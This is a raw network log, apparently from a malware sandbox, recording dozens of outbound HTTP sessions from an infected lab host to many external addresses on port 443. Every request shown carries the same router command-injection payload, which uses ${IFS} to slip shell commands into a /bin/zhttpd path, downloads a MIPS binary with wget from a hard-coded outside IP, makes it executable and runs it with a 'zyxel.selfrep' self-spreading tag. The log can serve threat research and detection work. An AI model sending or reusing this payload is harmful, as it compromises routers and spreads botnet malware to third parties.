                                                        Feb 2, 2024 06:21:13.998662949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5408192.168.2.1449282204.1.167.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998725891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5409192.168.2.1456646175.125.126.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998749971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5410192.168.2.1458602205.202.195.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998770952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5411192.168.2.1449724129.212.125.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998804092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5412192.168.2.146055291.152.201.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998856068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5413192.168.2.145847091.8.75.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998903990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5414192.168.2.143359051.249.55.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998931885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5415192.168.2.144290498.109.6.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.998961926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5416192.168.2.145448443.120.225.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999021053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5417192.168.2.1451760182.161.172.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999058008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5418192.168.2.146084470.11.172.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999150038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5419192.168.2.146057479.154.81.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999175072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5420192.168.2.1447900206.250.8.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999249935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5421192.168.2.1457470219.162.178.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999283075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5422192.168.2.144533647.242.25.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999311924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5423192.168.2.1455546190.44.107.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999346018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5424192.168.2.1443282200.109.210.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999386072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5425192.168.2.143873212.255.128.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999420881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5426192.168.2.1446390142.25.48.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999465942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5427192.168.2.1459680102.80.19.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999511003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5428192.168.2.1447010167.157.101.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999552965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5429192.168.2.1454772139.157.220.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999591112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5430192.168.2.1457370109.27.210.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999641895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5431192.168.2.144485445.92.44.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999661922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5432192.168.2.144123019.129.173.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999733925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5433192.168.2.145634699.229.139.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999763012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5434192.168.2.144341278.201.170.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999795914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5435192.168.2.145298872.55.160.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999829054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5436192.168.2.1433566185.169.16.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999878883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5437192.168.2.1451356190.179.211.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999910116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5438192.168.2.145538475.13.87.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999938011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5439192.168.2.1452272212.119.188.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:13.999963045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5440192.168.2.143538676.57.30.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000015020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5441192.168.2.1450962199.98.160.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000046015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5442192.168.2.1435112148.144.16.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000080109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5443192.168.2.145244652.202.235.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000125885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5444192.168.2.1439534141.166.210.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000160933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5445192.168.2.1433442211.62.246.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000201941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5446192.168.2.1433416112.153.104.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000241995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5447192.168.2.1454964110.195.157.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000300884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5448192.168.2.1433124191.195.67.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000351906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5449192.168.2.143755024.171.83.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000375032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5450192.168.2.144069444.199.222.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000416040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5451192.168.2.146012245.50.220.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000463009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5452192.168.2.1454580222.85.225.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000509977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5453192.168.2.14345925.32.8.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000560999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5454192.168.2.1457448147.48.21.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000591040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5455192.168.2.1456574140.13.177.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000638008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5456192.168.2.1447746217.6.79.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000684023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5457192.168.2.145904262.147.124.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000721931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5458192.168.2.1451882192.39.187.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000756025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5459192.168.2.1454654141.6.234.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000813007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5460192.168.2.1460706210.246.150.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000854969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5461192.168.2.1459832199.236.241.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000889063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5462192.168.2.1438220116.168.98.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000920057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5463192.168.2.1435118104.115.99.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.000976086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5464192.168.2.1433098178.129.182.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001008034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5465192.168.2.1445470103.10.119.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001035929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5466192.168.2.144970068.128.29.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001086950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5467192.168.2.1453884113.170.49.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001137018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5468192.168.2.1459812220.37.73.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001171112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5469192.168.2.1456334104.99.2.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:14.001211882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5470192.168.2.1457356216.85.240.89443
                                                        TimestampBytes transferredDirectionData
